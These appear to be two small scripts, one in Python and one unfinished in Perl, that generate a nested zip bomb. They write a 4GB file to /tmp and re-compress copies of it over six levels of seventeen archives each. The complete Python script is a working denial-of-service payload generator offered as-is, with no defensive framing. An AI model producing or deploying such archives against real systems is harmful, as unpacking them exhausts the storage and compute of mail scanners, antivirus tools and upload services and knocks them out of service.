File: zip_bomb.py
import os

depth = 6
width = 17

zip_file = 'bomb.zip'
tmp_dir = '/tmp/zip_bomb'
file_name = '0.txt'

mb = 1048576


def create_tmp_dir():
    if not os.path.exists(tmp_dir):
        os.makedirs(tmp_dir)

def create_zip(target, source):
    command = 'zip -rmj9 {} {}'.format(target, source)
    os.system(command)

def create_file():
    file_path = '{}/{}'.format(tmp_dir, file_name)
    f = open(file_path, 'w')
    # 4GB - 1byte (largest file that zip will currently compress)
    for i in range((1024 * 4) - 1):
        f.write('1' * mb)
    f.write('1' * (mb - 1))
    f.close()

    target = '{}/0-0.zip'.format(tmp_dir)
    create_zip(target, file_path)

def create_bomb():
    for d in range(depth):
        if d > 0:
            target = '{}/{}-0.zip'.format(tmp_dir, d)
            source = '{}/*.zip'.format(tmp_dir)
            create_zip(target, source)
        for w in range(1, width):
            command = 'cp {}/{}-0.zip {}/{}-{}.zip'.format(tmp_dir, d, tmp_dir, d, w)
            os.system(command)

create_tmp_dir()
create_file()
create_bomb()

source = '{}/*.zip'.format(tmp_dir)
create_zip(zip_file, source)

File: zip_bomb.pl
#!/usr/bin/perl
use strict;
use warnings;

my $depth = 6;
my $width = 17;

my $zip_file = 'bomb.zip';
my $tmp_dir = '/tmp/zip_bomb';
my $file_name = '0.txt';

my $mb = 1048576;


sub create_tmp_dir {
    `mkdir -p $tmp_dir`
}

sub create_zip {
    (my $target, my $source) = @_;
    `zip -rmj9 $target $source`
}

sub create_file {
    my $file_path = "$tmp_dir/$file_name";
    open FILE, ">$file_path" or die "unable to open $file_path $!";
    foreach my $i (0..(1024 * 4) - 2) {
        print FILE '1'x$mb;
    }
    print FILE '1'x($mb - 1);
    close FILE;

    create_zip("$tmp_dir/0-0.zip", $file_path);
}

sub create_bomb {
    # TODO
}

create_tmp_dir();
create_file();
create_bomb();
